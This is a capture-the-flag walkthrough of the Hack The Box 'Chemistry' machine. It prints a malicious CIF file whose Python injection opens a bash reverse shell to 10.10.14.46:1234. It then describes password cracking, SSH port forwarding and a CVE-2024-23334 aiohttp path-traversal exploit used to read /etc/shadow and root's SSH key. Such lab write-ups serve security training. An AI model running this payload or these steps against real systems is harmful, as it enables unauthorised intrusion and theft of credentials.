HTB | Chemistry

This is a Linux box. You can find it here.

Skill Learned

• CIF exploit

• CVE-2024-23334

NMAP

IP:10.129.30.124

nmap -sT -p- --min-rate 10000 10.129.30.124

nmap

Port 5000

port 5000

on registering we have a file upload option with .cif to to upload.

We can download an example.cif to look at the syntax

Foothold/shell

CIF Exploit

example.cif

It is a CIF (Crystallographic Information File) format, which is commonly used in crystallography to describe the atomic structure of crystals. Here’s a breakdown of the data:

1. Cell Parameters:

   These describe the dimensions of the unit cell (the repeating structure in the crystal lattice):

   • _cell_length_a: The length of the unit cell along the "a" axis (10.00000 Å).

   • _cell_length_b: The length of the unit cell along the "b" axis (10.00000 Å).

   • _cell_length_c: The length of the unit cell along the "c" axis (10.00000 Å).

   • _cell_angle_alpha: The angle between the "b" and "c" axes (90.00000 degrees).

   • _cell_angle_beta: The angle between the "a" and "c" axes (90.00000 degrees).

   • _cell_angle_gamma: The angle between the "a" and "b" axes (90.00000 degrees).

   These parameters indicate that the unit cell is cubic (since all angles are 90 degrees and the lengths are equal).

2. Symmetry Information:

   • _symmetry_space_group_name_H-M 'P 1': This specifies the space group of the crystal. 'P 1' indicates the simplest space group, with no symmetry beyond translational symmetry. It is the most basic space group in crystallography, implying there are no additional symmetry operations like rotations or reflections.

3. Atomic Positions: The loop section defines the positions of atoms within the unit cell. The fractional coordinates (_fract_x, _fract_y, _fract_z) specify the position of each atom relative to the dimensions of the unit cell:

   • H (Hydrogen):

     • Coordinates: (0.00000, 0.00000, 0.00000) — at the origin of the unit cell.

     • Occupancy: 1 (fully occupied).

   • O (Oxygen):

     • Coordinates: (0.50000, 0.50000, 0.50000) — at the centre of the unit cell.

     • Occupancy: 1 (fully occupied).

Overall Explanation: This CIF file describes a crystal with a simple cubic unit cell, where a hydrogen atom is located at the origin and an oxygen atom is located at the centre of the unit cell. The space group "P 1" implies no symmetry beyond basic translation, meaning there are no mirror planes, rotations, or inversions in the crystal structure.

Payload

On googling the payload I found this GitHub repo. After some hit and trail, I found the reverse shell

edit example.cif and add the below lines

_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c 'sh -i >& /dev/tcp/10.10.14.46/1234 0>&1'");0,0,0'


_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "

the above payload that is not part of standard crystallographic data but is instead a Python-based shell command injection. Here's what's happening in this command:

Breakdown:

• _space_group_magn.transform_BNS_Pp_abc: This CIF tag seems to be altered for malicious purposes. Instead of normal crystallographic information, it contains Python code hidden within a data field.

• The Code:

  • The code looks for a specific class (BuiltinImporter) using Python's introspection capabilities.

  • It then calls os.system to execute a shell command that opens a reverse shell connection to IP 10.10.14.46 on port 1234. The command sh -i >& /dev/tcp/10.10.14.46/1234 0>&1 is designed to establish a reverse shell (giving remote access to the system) to the specified IP and port.

• Reverse Shell: If executed successfully, this command will attempt to open a reverse shell, which means the machine processing the CIF file will try to connect back to the attacker's machine at 10.10.14.46 on port 1234. This would provide the attacker with remote control over the machine running the CIF file.

Upload the file and click on View also before clicking view start the nc listener

nc -nlvp 1234

We found user.txt but we do not have permission to view

On looking around the server we found a database.db file

database.db

On further analysing the databse.db we found passwords for users.

passwords

Found the password for Rosa via crackstation

crackstation

Now we can view the user.txt

user.txt

Priv Esc

For further enumeration, we will copy linpeas to the box.

and now we will run it

We found that there is some internal service running on port 8080

8080

let's do port forwarding of port 8080 to our 8888 So that we can access it via localhost

ssh -L 8888:localhost:8080 rosa@10.129.30.146

port forward

On using nmap on localhost 8888, we found aiohttp 3.9.1 is running on port 8080 internally

nmap

CVE 2024-23334

On googling about aiohttp 3.9.1 exploit we found this GitHub repo for POC

exploit.sh

Let's copy this exploit to the box and run it

Looks like we have to modify the script

After making necessary changes to the script Now when we run it we can get /etc/passwd

/etc/password

We can verify if we can cat /etc/shadow or not, this will confirm whether we can view files with root permission or not, we have to replace etc/passwd to etc/shadow in the script and run

/etc/shadow

And now we are sure that the exploit works properly we can get root.txt

Now there are two methods

Method 1

We can directly cat root.txt. For this, we have to change /etc/shadow to root/root.txt

and run the script

root.txt

Method 2

We can get the id_rsa for root and ssh as root

Now when we run it we will have root's RSA key

copy the key and ssh as root

ssh as root

now we can grab the root.txt

root.txt